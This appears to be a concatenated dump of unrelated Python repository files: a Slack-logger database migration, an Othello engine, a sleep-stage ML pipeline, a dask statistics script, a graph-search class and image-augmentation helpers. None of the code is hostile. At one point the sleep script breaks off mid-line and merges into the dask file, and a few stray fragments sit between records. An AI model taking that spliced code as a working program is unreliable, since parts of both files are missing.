server_default=sa.text('CURRENT_TIMESTAMP'), nullable=False),\n sa.Column('updated_at', sa.DateTime(), server_default=sa.text('CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP'), nullable=False),\n sa.ForeignKeyConstraint(['team_id'], ['slack_workspaces.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_index(op.f('ix_slack_channels_local_id'), 'slack_channels', ['local_id'], unique=False)\n op.create_table('slack_members',\n sa.Column('id', sa.String(length=128), 
nullable=False, comment='Primary Key({team_id}/{user_id})'),\n    sa.Column('user_id', sa.String(length=64), nullable=True, comment='Slack UserID'),\n    sa.Column('team_id', sa.String(length=64), nullable=False, comment='Team ID'),\n    sa.Column('name', sa.String(length=128), nullable=False, comment='User Name'),\n    sa.Column('deleted', sa.Boolean(), nullable=False, comment='Delete Flag'),\n    sa.Column('color', sa.String(length=64), nullable=False, comment='Color'),\n    sa.Column('real_name', sa.String(length=128), nullable=False, comment='Real Name'),\n    sa.Column('tz', sa.String(length=64), nullable=True, comment='Timezone'),\n    sa.Column('tz_offset', sa.Integer(), nullable=False, comment='Timezone Offset'),\n    sa.Column('image_24', sa.Text(), nullable=False, comment='Avatar Icon(24)'),\n    sa.Column('image_32', sa.Text(), nullable=False, comment='Avatar Icon(32)'),\n    sa.Column('image_48', sa.Text(), nullable=False, comment='Avatar Icon(48)'),\n    sa.Column('image_72', sa.Text(), nullable=False, comment='Avatar Icon(72)'),\n    sa.Column('image_192', sa.Text(), nullable=False, comment='Avatar Icon(192)'),\n    sa.Column('image_512', sa.Text(), nullable=False, comment='Avatar Icon(512)'),\n    sa.Column('is_bot', sa.Boolean(), nullable=False, comment='Bot Flag'),\n    sa.Column('is_owner', sa.Boolean(), nullable=False, comment='Owner Flag'),\n    sa.Column('is_admin', sa.Boolean(), nullable=False, comment='Admin Flag'),\n    sa.Column('created_at', sa.DateTime(), server_default=sa.text('CURRENT_TIMESTAMP'), nullable=False),\n    sa.Column('updated_at', sa.DateTime(), server_default=sa.text('CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP'), nullable=False),\n    sa.ForeignKeyConstraint(['team_id'], ['slack_workspaces.id'], ),\n    sa.PrimaryKeyConstraint('id')\n    )\n    op.create_index(op.f('ix_slack_members_user_id'), 'slack_members', ['user_id'], unique=False)\n    op.create_table('slack_messages',\n    sa.Column('id', sa.String(length=128), nullable=False, comment='Message ID({workspace_id}/{channel_id}/{ts})'),\n    sa.Column('channel_id', sa.String(length=64), nullable=True, comment='Channel ID'),\n    sa.Column('user_id', sa.String(length=64), nullable=True, comment='User ID(Workspace)'),\n    sa.Column('text', sa.Text(), nullable=False, comment='Text Body'),\n    sa.Column('ts', sa.String(length=64), nullable=False, comment='Post Timestamp'),\n    sa.Column('thread_ts', sa.String(length=64), nullable=True, comment='Thread Timestamp'),\n    sa.Column('created_at', sa.DateTime(), server_default=sa.text('CURRENT_TIMESTAMP'), nullable=False),\n    sa.Column('updated_at', sa.DateTime(), server_default=sa.text('CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP'), nullable=False),\n    sa.ForeignKeyConstraint(['channel_id'], ['slack_channels.id'], ),\n    sa.ForeignKeyConstraint(['user_id'], ['slack_members.id'], ),\n    sa.PrimaryKeyConstraint('id')\n    )\n    op.create_index(op.f('ix_slack_messages_ts'), 'slack_messages', ['ts'], unique=False)\n    op.create_table('slack_attachments',\n    sa.Column('id', sa.String(length=128), nullable=False, comment='Primary Key({message_id}/{attachment_id})'),\n    sa.Column('message_id', sa.String(length=128), nullable=True, comment='Message ID'),\n    sa.Column('attachment_id', sa.String(length=64), nullable=True, comment='Attachment id'),\n    sa.Column('service_name', sa.String(length=64), nullable=True, comment='Service name (probably the site name)'),\n    sa.Column('title', sa.String(length=128), nullable=True, comment='Probably the page title'),\n    sa.Column('text', sa.Text(), nullable=True, comment='Page summary'),\n    sa.Column('original_url', sa.Text(), nullable=True, comment='URL info'),\n    
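The created_at/updated_at pair used in every table above targets MySQL's ON UPDATE CURRENT_TIMESTAMP behavior; roughly equivalent standalone DDL (assumed MySQL dialect) kept here as a reference string:

# Reference only: approximate DDL these sa.Column definitions generate.
DDL = """
CREATE TABLE example (
    id         VARCHAR(64) NOT NULL,
    created_at DATETIME NOT NULL DEFAULT CURRENT_TIMESTAMP,
    updated_at DATETIME NOT NULL DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP,
    PRIMARY KEY (id)
)
"""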
sa.Column('thumb_url', sa.Text(), nullable=True, comment='Thumbnail image'),\n    sa.Column('service_icon', sa.Text(), nullable=True, comment='Site icon image'),\n    sa.Column('created_at', sa.DateTime(), server_default=sa.text('CURRENT_TIMESTAMP'), nullable=False),\n    sa.Column('updated_at', sa.DateTime(), server_default=sa.text('CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP'), nullable=False),\n    sa.ForeignKeyConstraint(['message_id'], ['slack_messages.id'], ),\n    sa.PrimaryKeyConstraint('id')\n    )\n    op.create_index(op.f('ix_slack_attachments_attachment_id'), 'slack_attachments', ['attachment_id'], unique=False)\n    op.create_table('slack_files',\n    sa.Column('id', sa.String(length=128), nullable=False, comment='Primary Key({message_id}/{file_id})'),\n    sa.Column('message_id', sa.String(length=128), nullable=True, comment='Message ID'),\n    sa.Column('file_id', sa.String(length=64), nullable=False, comment='File_ID'),\n    sa.Column('title', sa.String(length=128), nullable=True, comment='File name'),\n    sa.Column('filetype', sa.String(length=64), nullable=True, comment='File type'),\n    sa.Column('size', sa.Integer(), nullable=True, comment='File size (bytes?)'),\n    sa.Column('permalink', sa.Text(), nullable=True, comment='File link (permalink)'),\n    sa.Column('created_at', sa.DateTime(), server_default=sa.text('CURRENT_TIMESTAMP'), nullable=False),\n    sa.Column('updated_at', sa.DateTime(), server_default=sa.text('CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP'), nullable=False),\n    sa.ForeignKeyConstraint(['message_id'], ['slack_messages.id'], ),\n    sa.PrimaryKeyConstraint('id', 'file_id')\n    )\n    op.create_index(op.f('ix_slack_files_filetype'), 'slack_files', ['filetype'], unique=False)\n    # ### end Alembic commands ###\n\n\ndef downgrade():\n    # ### commands auto generated by Alembic - please adjust! ###\n    op.drop_index(op.f('ix_slack_files_filetype'), table_name='slack_files')\n    op.drop_table('slack_files')\n    op.drop_index(op.f('ix_slack_attachments_attachment_id'), table_name='slack_attachments')\n    op.drop_table('slack_attachments')\n    op.drop_index(op.f('ix_slack_messages_ts'), table_name='slack_messages')\n    op.drop_table('slack_messages')\n    op.drop_index(op.f('ix_slack_members_user_id'), table_name='slack_members')\n    op.drop_table('slack_members')\n    op.drop_index(op.f('ix_slack_channels_local_id'), table_name='slack_channels')\n    op.drop_table('slack_channels')\n    op.drop_table('slack_workspaces')\n    # ### end Alembic commands ###\n","repo_name":"ukyoda/slacklogger","sub_path":"slackapi/migrations/versions/18083b656fc0_create_tables.py","file_name":"18083b656fc0_create_tables.py","file_ext":"py","file_size_in_byte":9238,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"33310090164","text":"\"\"\"This module shows how many lines of input there are on the command line\nlines in the standard input\nInput: any string from the system standard input\nThe output is a message below the command line\n\"\"\"\n\nimport sys\n\ncount = 0\n\nfor line in sys.stdin:\n    count += 1\n\nprint(count, \"lines in the standard input\")\n","repo_name":"fvdldn/training_patient","sub_path":"count-lines.py","file_name":"count-lines.py","file_ext":"py","file_size_in_byte":307,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"24240787443","text":"class Board:\n\n    # directions to search\n    __directions = [(1, 1), (1, 0), (1, -1), (0, -1), (-1, -1), (-1, 0), (-1, 1), (0, 1)]\n\n    def __init__(self, n):\n        \"\"\"\n        Set up the board's starting state.\n        :param 
n: Board size.\n        \"\"\"\n        self.n = n\n        self.pieces = [None] * self.n\n        for i in range(self.n):\n            self.pieces[i] = [0]*self.n\n        self.pieces[int(self.n / 2) - 1][int(self.n / 2)] = 1\n        self.pieces[int(self.n / 2)][int(self.n / 2) - 1] = 1\n        self.pieces[int(self.n / 2) - 1][int(self.n / 2) - 1] = -1\n        self.pieces[int(self.n / 2)][int(self.n / 2)] = -1\n\n    def __getitem__(self, index):\n        \"\"\"\n        Allows using [][] indexing.\n        \"\"\"\n        return self.pieces[index]\n\n    def countDiff(self, color):\n        \"\"\"\n        Counts the difference between the number of pieces of colors color and -color\n        \"\"\"\n        count = 0\n        for y in range(self.n):\n            for x in range(self.n):\n                if self[x][y] == color:\n                    count += 1\n                if self[x][y] == -color:\n                    count -= 1\n        return count\n\n    def getCount(self, color):\n        \"\"\"\n        Counts the number of pieces of the given color on the board.\n        \"\"\"\n        count = 0\n        for y in range(self.n):\n            for x in range(self.n):\n                if self[x][y] == color:\n                    count += 1\n        return count\n\n    def get_legal_moves(self, color):\n        \"\"\"\n        Computes the possible moves for color.\n        \"\"\"\n        moves = set()\n\n        for y in range(self.n):\n            for x in range(self.n):\n                if self[x][y] == color:\n                    newmoves = self.get_moves_for_square((x, y))\n                    moves.update(newmoves)\n        return list(moves)\n\n    def has_legal_moves(self, color):\n        \"\"\"\n        Determines whether color has any possible moves.\n        \"\"\"\n        for y in range(self.n):\n            for x in range(self.n):\n                if self[x][y] == color:\n                    newmoves = self.get_moves_for_square((x, y))\n                    if len(newmoves) > 0:\n                        return True\n        return False\n\n    def get_moves_for_square(self, square):\n        \"\"\"\n        Computes the legal moves for the specific square.\n        \"\"\"\n        (x, y) = square\n        color = self[x][y]\n        if color == 0:\n            return None\n        moves = []\n        for direction in self.__directions:\n            move = self._discover_move(square, direction)\n            if move:\n                moves.append(move)\n        return moves\n\n    def execute_move(self, move, color):\n        \"\"\"\n        Executes the given move. 
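The __directions table above plus the _increment_move generator that follows amount to walking a ray from a square until it leaves the board; a dependency-free sketch:

# Yield successive squares along one direction while inside an n x n board.
def increment_move(move, direction, n):
    x, y = move[0] + direction[0], move[1] + direction[1]
    while 0 <= x < n and 0 <= y < n:
        yield (x, y)
        x, y = x + direction[0], y + direction[1]

print(list(increment_move((2, 2), (1, 1), 5)))   # [(3, 3), (4, 4)]
print(list(increment_move((0, 0), (-1, 0), 5)))  # []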
Flips pieces as necessary.\n        \"\"\"\n        flips = [flip for direction in self.__directions\n                 for flip in self._get_flips(move, direction, color)]\n        assert len(list(flips)) > 0\n        for x, y in flips:\n            self[x][y] = color\n\n    def _discover_move(self, origin, direction):\n        \"\"\"\n        Returns the end point of a legal move starting at origin.\n        We walk using _increment_move()\n        \"\"\"\n        x, y = origin\n        color = self[x][y]\n        flips = []\n        for x, y in Board._increment_move(origin, direction, self.n):\n            if self[x][y] == 0:\n                if flips:\n                    return x, y\n                else:\n                    return None\n            elif self[x][y] == color:\n                return None\n            elif self[x][y] == -color:\n                flips.append((x, y))\n\n    def _get_flips(self, origin, direction, color):\n        \"\"\"\n        Returns the list of pieces that have to be flipped for a move at origin in the given direction for\n        the given color.\n        \"\"\"\n        flips = [origin]\n        for x, y in Board._increment_move(origin, direction, self.n):\n            if self[x][y] == 0:\n                return []\n            if self[x][y] == -color:\n                flips.append((x, y))\n            elif self[x][y] == color and len(flips) > 0:\n                return flips\n        return []\n\n    @staticmethod\n    def _increment_move(move, direction, n):\n        \"\"\"\n        Generates the squares along a move direction.\n        \"\"\"\n        move = list(map(sum, zip(move, direction)))\n        while all(map(lambda x: 0 <= x < n, move)):\n            yield move\n            move = list(map(sum, zip(move, direction)))\n","repo_name":"xevolesi/GameAI","sub_path":"othello/OthelloLogic.py","file_name":"OthelloLogic.py","file_ext":"py","file_size_in_byte":5020,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"8331667374","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.model_selection import train_test_split, cross_val_score, StratifiedKFold\nfrom sklearn.svm import SVC\nfrom sklearn import metrics,model_selection\nfrom sklearn.model_selection import GridSearchCV, RandomizedSearchCV\nfrom sklearn.metrics import accuracy_score, classification_report, confusion_matrix\nimport glob\nfrom scipy import stats\nimport datetime as dt\nfrom sklearn.neural_network import MLPClassifier\nimport tensorflow as tf\nfrom tensorflow.keras import datasets, layers, models\nfrom tensorflow.keras.layers import Conv2D, MaxPooling2D,Dropout,Flatten,Dense\n\nACC = pd.read_csv(\"C:/Vs code file/Machine Learning/Machine-Learning/Ac9/acceleration.txt\", sep = ' ',names=['timedelta', 'accX', 'accY', 'accZ'])\nHeartR = pd.read_csv(\"C:/Vs code file/Machine Learning/Machine-Learning/Ac9/heartrate.txt\", sep = ',',names=['timedelta', 'heartrate'])\nSleepL = pd.read_csv(\"C:/Vs code file/Machine Learning/Machine-Learning/Ac9/labeled_sleep.txt\", sep = ' ',names=['timedelta', 'sleep'])\n#C:\\Vs code file\\ML\\Ac8\n\n#check timedelta min/max of acc, hr, slp\nACC_max_date = ACC[\"timedelta\"].max()\nACC_min_date = ACC[\"timedelta\"].min()\n\nHR_max_date = HeartR[\"timedelta\"].max()\nHR_min_date = HeartR[\"timedelta\"].min()\n\nSlp_max_date = SleepL[\"timedelta\"].max()\nSlp_min_date = SleepL[\"timedelta\"].min()\n\n\nprint(\"ACC max : {0} ACC min : {1}\".format(ACC_max_date, ACC_min_date))\nprint(\"HR max : {0} HR min : {1}\".format(HR_max_date, HR_min_date))\nprint(\"Slp max : {0} Slp min : {1}\".format(Slp_max_date, Slp_min_date))\n\n\n\nACC_new = ACC[(ACC[\"timedelta\"]> ACC_min_date) & (ACC[\"timedelta\"] < ACC_max_date) & (ACC[\"timedelta\"]> HR_min_date) & (ACC[\"timedelta\"] < HR_max_date) &(ACC[\"timedelta\"]> Slp_min_date) & (ACC[\"timedelta\"] < Slp_max_date)]\nHeartR_new = 
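The timestamp alignment used on the sensor streams below rounds raw timedelta stamps to 1 s and then aggregates duplicates; a tiny pandas sketch with made-up samples (note the sketch uses .dt.round, the accessor form of the rounding):

import pandas as pd

acc = pd.DataFrame({"timedelta": [0.1, 0.4, 1.2, 1.6], "accX": [1.0, 3.0, 2.0, 4.0]})
acc["timedelta"] = pd.to_timedelta(acc["timedelta"], "seconds").dt.round("1s")
print(acc.groupby("timedelta")["accX"].mean())
# 0 days 00:00:00    2.0   (mean of 1.0 and 3.0; both round to 0 s)
# 0 days 00:00:01    2.0   (1.2 rounds down to 1 s)
# 0 days 00:00:02    4.0   (1.6 rounds up to 2 s)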
HeartR[(HeartR[\"timedelta\"]> ACC_min_date) & (HeartR[\"timedelta\"] < ACC_max_date) & (HeartR[\"timedelta\"]> HR_min_date) & (HeartR[\"timedelta\"] < HR_max_date) &(HeartR[\"timedelta\"]> Slp_min_date) & (HeartR[\"timedelta\"] < Slp_max_date)]\nSleepL_new = SleepL[(SleepL[\"timedelta\"]> ACC_min_date) & (SleepL[\"timedelta\"] < ACC_max_date) & (SleepL[\"timedelta\"]> HR_min_date) & (SleepL[\"timedelta\"] < HR_max_date) &(SleepL[\"timedelta\"]> Slp_min_date) & (SleepL[\"timedelta\"] < Slp_max_date)]\n\n# print(\"-----before convert datetime and round and average to 1s-----\")\n# print(ACC_new)\n\n\n# ------------ Rounding ACC (Rounding to 1 sec) -------------------------------\n# Convert to datetime and round to second,\nACC_new['timedelta'] = pd.DataFrame(pd.to_timedelta(ACC_new['timedelta'], 'seconds').round('1s'))\n\ndf_acc_X = ACC_new.groupby('timedelta')['accX'].mean()\ndf_acc_Y = ACC_new.groupby('timedelta')['accY'].mean()\ndf_acc_Z = ACC_new.groupby('timedelta')['accZ'].mean()\n\nACC_new2 = pd.concat([df_acc_X, df_acc_Y, df_acc_Z], axis=1)\nACC_new2 = ACC_new2.reset_index()\nACC_new2['timedelta'] = ACC_new2['timedelta'] - ACC_new2['timedelta'].min()\n\n# print(\"-----after convert datetime and round and average to 1s-----\")\n# print(ACC_new2)\n\n# ------------ Rounding Heart Rate (Rounding to 1 sec) -------------------------------\nHeartR_new['timedelta'] = pd.DataFrame(pd.to_timedelta(HeartR_new['timedelta'],'seconds').round('1s'))\n# Resampling every 1s with median with ffill\nresample_rule = '1s'\nHeartR_new2 = HeartR_new.set_index('timedelta').resample(resample_rule,).median().ffill()\nHeartR_new2 = HeartR_new2.reset_index()\nHeartR_new2['timedelta'] = HeartR_new2['timedelta'] - HeartR_new2['timedelta'].min()\n\n\n# ------------ Rounding Sleep Label (Rounding to 1 sec) -------------------------------\nSleepL_new['timedelta'] = pd.DataFrame(pd.to_timedelta(SleepL_new['timedelta'],'seconds').round('1s'))\n# Resampling every 1s with median with ffill\nresample_rule = '1s'\nSleepL_new2 = SleepL_new.set_index('timedelta').resample(resample_rule,).median().ffill()\nSleepL_new2 = SleepL_new2.reset_index()\nSleepL_new2['timedelta'] = SleepL_new2['timedelta'] - SleepL_new2['timedelta'].min()\n\nSleepL_new2.replace({-1:0},inplace=True)\nSleepL_new2['sleep'].fillna(0)\n\n#8.1E merge all data\ndf = []\ndf = pd.merge_asof(ACC_new2,HeartR_new2,on='timedelta',direction='nearest')\ndf = pd.merge_asof(df, SleepL_new2, on = 'timedelta',direction='nearest')\n\nHeartR_new2['heartrate'].fillna(HeartR_new2.median())\n\n\ndf.drop(columns = ['timedelta'],inplace = True)\n# print(df)\n# Standardized data\nfeature_columns = ['accX', 'accY', 'accZ', 'heartrate']\nlabel_columns = ['sleep']\n\n\n# Standardized data\nstandard_scaler = StandardScaler()\nfeature_columns = ['accX', 'accY', 'accZ', 'heartrate']\nlabel_columns = ['sleep']\ndf_feature = df[feature_columns] #standardized data of df_feature\ndf_feature = pd.DataFrame(standard_scaler.fit_transform(df_feature.values),index = df_feature.index,columns=df_feature.columns)\n# print(df_feature)\ndf_label = df[label_columns]\n# print(\"df_label\")\n# print(df_label)\n# Visualize signals\n# df_feature.plot()\n# plt.show()\n# df_label.plot()\n# plt.show()\n\n# ------------ 1D to 3D feature-------------------------------\n# set sliding window parameter\nslidingW = 100\nStride_step = 5\nn_features = 4 #number of colums form df_feature\ndf_feature3D = np.array([],ndmin=2)\ndf_label_new = np.array([])\n\nfor t in range(0 , len(df_feature), Stride_step ):\n F3d 
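The window arithmetic behind the 3-D feature builder above: a length-100 window at stride 5 over N rows yields floor((N - 100) / 5) + 1 full windows. A numpy check:

import numpy as np

N, window, stride = 1000, 100, 5
X = np.arange(N * 4, dtype=float).reshape(N, 4)          # stand-in for df_feature
windows = [X[t:t + window] for t in range(0, N, stride) if t + window <= N]
print(len(windows), (N - window) // stride + 1)          # 181 181
print(windows[0].shape)                                  # (100, 4)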
= np.array(df_feature[t:t+slidingW],ndmin=2)\n # print(F3d[0])\n if len(F3d) = 0]\n return df\n\n# takes two pandas.DataFrame with columns: cluster, gene, sum\n# aggregates along cluster/gene, adding sums together\ndef combine_chunk_statistics(df1, df2):\n return pandas.concat([df1, df2]).groupby(['cluster', 'gene']).sum().reset_index()\n\n\n# takes xarray.Dataset, returns pandas.DataFrame wrapped in dask.delayed()\ndef delayed_chunk_statistics(ds, chunk_index):\n da = ds.X.data\n chunk = da.blocks[chunk_index]\n offset = [a*b for (a,b) in zip(chunk_index, da.chunksize)]\n # metadata objects to pass in to chunk_statistics (methods called via\n # dask.delayed(...) are not supposed to access any global state)\n cluster_ids = ds.cluster[offset[0]:offset[0]+chunk.shape[0]]\n genes = ds.gene[offset[1]:offset[1]+chunk.shape[1]]\n return dask.delayed(chunk_statistics)(chunk, cluster_ids, genes)\n\n\n# takes a list of pandas.DataFrame wrapped in dask.delayed\n# returns a single dask.delayed pandas.DataFrame with the full statistics\ndef combine_delayed_results(results):\n def pairs(xs):\n for i in range(0, len(xs), 2):\n yield xs[i:i+2]\n if len(results) == 0:\n return None # shouldn't happen...\n elif len(results) == 1:\n return results[0]\n else:\n new_results = []\n for pair in pairs(results):\n if len(pair) == 2:\n new_results.append(dask.delayed(combine_chunk_statistics)(pair[0], pair[1]))\n elif len(pair) == 1:\n new_results.append(dask.delayed(pair[0]))\n return combine_delayed_results(new_results)\n\n\n# Dask requires wrapping in a __name__ == '__main__' check\n# in order to use the distributed client locally\nif __name__ == '__main__':\n args = ARG_PARSER.parse_args()\n input_file = args.dataset[0].rstrip(os.sep)\n directory = os.path.dirname(input_file)\n base_name = \".\".join(os.path.basename(input_file).split('.')[0:-1])\n output_file = os.path.join(directory, base_name + '.cl-stats.parquet')\n\n with AutoDaskCluster(args.cluster) as cluster, dask.distributed.Client(cluster) as client:\n logging.info(\"Dashboard link: %s\" % client.dashboard_link)\n\n logging.info(\"Loading %s\" % input_file)\n data = xarray.open_zarr(input_file)\n\n if args.persist:\n logging.info(\"Persisting data into cluster memory...\")\n data = data.persist()\n dask.distributed.wait(data)\n logging.info(\"Finished persisting data\")\n\n logging.info(\"Computing statistics\")\n\n da = data.X.data # access underlying dask array directly\n delayed_results = []\n\n for inds in itertools.product(*map(range, da.blocks.shape)):\n delayed_results.append(delayed_chunk_statistics(data, inds))\n\n results = combine_delayed_results(delayed_results)\n\n if args.visualize:\n logging.info(\"Saving task graph: %s\" % TASK_GRAPH_FILE)\n dask.visualize(results, filename=TASK_GRAPH_FILE)\n\n results = results.compute()\n\n logging.info(\"Finished computing statistics, writing to %s\" % output_file)\n results.to_parquet(output_file)\n","repo_name":"danielford/AllenInstituteSandbox","sub_path":"cluster-stats-delayed.py","file_name":"cluster-stats-delayed.py","file_ext":"py","file_size_in_byte":4870,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"14807463164","text":"import random\nimport numpy as np\nimport heapdict\nimport sys\nfrom Clases.Arista import Arista\n\n\nclass Grafo(object):\n \n def __init__(self, id='grafo', dirigido=False):\n self.id = id\n self.dirigido = dirigido\n self.V = dict()\n self.E = dict()\n self.attr = dict()\n\n def __repr__(self):\n \n return 
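The shape of combine_delayed_results above: reduce a list pairwise into a balanced (log-depth) tree rather than folding left, so dask can merge partial results in parallel. A dask-free sketch using '+' in place of the delayed DataFrame merge:

def combine_pairwise(results, combine):
    while len(results) > 1:
        pairs = [results[i:i + 2] for i in range(0, len(results), 2)]
        results = [combine(p[0], p[1]) if len(p) == 2 else p[0] for p in pairs]
    return results[0]

print(combine_pairwise([1, 2, 3, 4, 5], lambda a, b: a + b))   # 15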
str(\"id: \" + str(self.id) + '\\n'\n + 'nodos: ' + str(self.V.values()) + '\\n'\n + 'aristas: ' + str(self.E.values()))\n\n def add_nodo(self, nodo):\n \n self.V[nodo.id] = nodo\n\n def add_arista(self, arista):\n \n if self.get_arista(arista.id):\n return False\n\n self.E[arista.id] = arista\n return True\n\n def get_arista(self, arista_id):\n \n if self.dirigido:\n return arista_id in self.E\n else:\n u, v = arista_id\n return (u, v) in self.E or (v, u) in self.E\n\n\n #Proyecto 3 generar pesos \n def generar_pesos(self):\n for arista in self.E.values():\n arista.attrs['peso'] = random.randint(1, 50)\n\n\n def to_graphviz(self, filename):\n \n edge_connector = \"--\"\n graph_directive = \"graph\"\n if self.dirigido:\n edge_connector = \"->\"\n graph_directive = \"digraph\"\n\n with open(filename, 'w') as f:\n f.write(f\"{graph_directive} {self.id} \" + \" {\\n\")\n for nodo in self.V:\n if \"Dijkstra\" in self.id:\n f.write(f\"\\\"{nodo} ({self.V[nodo].attrs['dist']})\\\";\\n\")\n else:\n f.write(f\"{nodo};\\n\")\n for arista in self.E.values():\n if \"Dijkstra\" in self.id:\n peso = np.abs(self.V[arista.u.id].attrs['dist']\n - self.V[arista.v.id].attrs['dist'])\n f.write(f\"\\\"{arista.u} ({self.V[arista.u.id].attrs['dist']})\\\"\"\n + f\" {edge_connector} \"\n + f\"\\\"{arista.v} ({self.V[arista.v.id].attrs['dist']})\\\"\"\n + f\";\\n\")\n else:\n f.write(f\"{arista.u} {edge_connector} {arista.v};\\n\")\n f.write(\"}\")\n\n#PROYECTO 2\n def BFS(self, s):\n if not s.id in self.V:\n print(\"Error, nodo no encontrado\", file=sys.stderr)\n exit(-1)\n\n bfs = Grafo(id=f\"BFS_{self.id}\", dirigido=self.dirigido)\n discovered = set()\n bfs.add_nodo(s)\n L0 = [s]\n discovered = set()\n added = [s.id]\n\n while True:\n L1 = []\n for node in L0:\n aristas = [ids_arista for ids_arista in self.E\n if node.id in ids_arista]\n\n for arista in aristas:\n v = arista[1] if node.id == arista[0] else arista[0]\n\n if v in discovered:\n continue\n\n bfs.add_nodo(self.V[v])\n bfs.add_arista(self.E[arista])\n discovered.add(v)\n L1.append(self.V[v])\n\n L0 = L1\n if not L0:\n break\n\n return bfs\n\n def DFS_R(self, u):\n \n dfs = Grafo(id=f\"DFS_R_{self.id}\", dirigido=self.dirigido)\n discovered = set()\n self.DFS_rec(u, dfs, discovered)\n\n return dfs\n\n def DFS_rec(self, u, dfs, discovered):\n \n dfs.add_nodo(u)\n discovered.add(u.id)\n aristas = (arista for arista in self.E if u.id in arista)\n\n for arista in aristas:\n v = arista[1]\n if not self.dirigido:\n v = arista[0] if u.id == arista[1] else arista[1]\n if v in discovered:\n continue\n dfs.add_arista(self.E[arista])\n self.DFS_rec(self.V[v], dfs, discovered)\n\n def DFS_I(self, s):\n dfs = Grafo(id=f\"DFS_I_{self.id}\", dirigido=self.dirigido)\n discovered = {s.id}\n dfs.add_nodo(s)\n u = s.id\n frontera = []\n while True:\n aristas = (arista for arista in self.E if u in arista)\n for arista in aristas:\n v = arista[1] if u == arista[0] else arista[0]\n if v not in discovered:\n frontera.append((u, v))\n\n # si se encuentra vacía romper el while\n if not frontera:\n break\n\n parent, child = frontera.pop()\n \n if child not in discovered:\n dfs.add_nodo(self.V[child])\n arista = Arista(self.V[parent], self.V[child])\n dfs.add_arista(arista)\n discovered.add(child)\n\n u = child\n\n return dfs\n\n#proyecto 3\n def Dijkstra(self, s):\n tree = Grafo(id=f\"{self.id}_Dijkstra\")\n line = heapdict.heapdict()\n parents = dict()\n in_tree = set()\n\n\n \n line[s] = 0\n parents[s] = None\n for node in self.V:\n if node == s:\n continue\n line[node] = 
np.inf\n            parents[node] = None\n\n        while line:\n            u, u_dist = line.popitem()\n            if u_dist == np.inf:\n                continue\n\n            self.V[u].attrs['dist'] = u_dist\n            tree.add_nodo(self.V[u])\n            if parents[u] is not None:\n                arista = Arista(self.V[parents[u]], self.V[u])\n                tree.add_arista(arista)\n            in_tree.add(u)\n\n            # get neighbor nodes\n            neigh = []\n            for arista in self.E:\n                if self.V[u].id in arista:\n                    v = arista[0] if self.V[u].id == arista[1] else arista[1]\n                    if v not in in_tree:\n                        neigh.append(v)\n\n            # update distances if necessary\n            for v in neigh:\n                arista = (u, v) if (u, v) in self.E else (v, u)\n                if line[v] > u_dist + self.E[arista].attrs['peso']:\n                    line[v] = u_dist + self.E[arista].attrs['peso']\n                    parents[v] = u\n\n        return tree\n","repo_name":"fsociety42/Argenis_Hernandez_Proyecto_3","sub_path":"Clases/Grafo.py","file_name":"Grafo.py","file_ext":"py","file_size_in_byte":6256,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"70277344052","text":"import imgaug.augmenters as iaa\nfrom scipy.ndimage import affine_transform\nfrom tqdm import tqdm_notebook as tqdm\nimport numpy as np\n\nimport albumentations as aug\nfrom imgaug import augmenters as iaa\nimport imgaug as ia\nimport cv2\nimport os\nimport numpy as np\nimport random\nimport skimage\nimport math\n#===================================================paug===============================================================\ndef order_points(pts):\n    # initialize a list of coordinates that will be ordered\n    # such that the first entry in the list is the top-left,\n    # the second entry is the top-right, the third is the\n    # bottom-right, and the fourth is the bottom-left\n    rect = np.zeros((4, 2), dtype=\"float32\")\n    # the top-left point will have the smallest sum, whereas\n    # the bottom-right point will have the largest sum\n    s = pts.sum(axis=1)\n    rect[0] = pts[np.argmin(s)]\n    rect[2] = pts[np.argmax(s)]\n    # now, compute the difference between the points, the\n    # top-right point will have the smallest difference,\n    # whereas the bottom-left will have the largest difference\n    diff = np.diff(pts, axis=1)\n    rect[1] = pts[np.argmin(diff)]\n    rect[3] = pts[np.argmax(diff)]\n    # return the ordered coordinates\n    return rect\n\ndef four_point_transform(image, pts):\n    # obtain a consistent order of the points and unpack them\n    # individually\n    rect = order_points(pts)\n    original = np.array([[0, 0],\n                [image.shape[1] - 1, 0],\n                [image.shape[1] - 1, image.shape[0] - 1],\n                [0, image.shape[0] - 1]], dtype=\"float32\")\n    M = cv2.getPerspectiveTransform(original, rect)\n    warped = cv2.warpPerspective(image, M, (image.shape[1], image.shape[0]))\n    return warped\n\ndef Perspective_aug(img, threshold1 = 0.25, threshold2 = 0.75):\n    # img = cv2.imread(img_name)\n    rows, cols, ch = img.shape\n\n    x0,y0 = random.randint(0, int(cols * threshold1)), random.randint(0, int(rows * threshold1))\n    x1,y1 = random.randint(int(cols * threshold2), cols - 1), random.randint(0, int(rows * threshold1))\n    x2,y2 = random.randint(int(cols * threshold2), cols - 1), random.randint(int(rows * threshold2), rows - 1)\n    x3,y3 = random.randint(0, int(cols * threshold1)), random.randint(int(rows * threshold2), rows - 1)\n    pts = np.float32([(x0,y0),\n                      (x1,y1),\n                      (x2,y2),\n                      (x3,y3)])\n\n    warped = four_point_transform(img, pts)\n\n    x_ = np.asarray([x0, x1, x2, x3])\n    y_ = np.asarray([y0, y1, y2, y3])\n\n    min_x = np.min(x_)\n    max_x = np.max(x_)\n    min_y = np.min(y_)\n    max_y = np.max(y_)\n\n    warped = warped[min_y:max_y,min_x:max_x,:]\n    return 
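order_points above ranks corners by coordinate sum (top-left smallest, bottom-right largest) and by the x-y difference; a quick numpy check on a shuffled rectangle, restating the same function:

import numpy as np

def order_points(pts):
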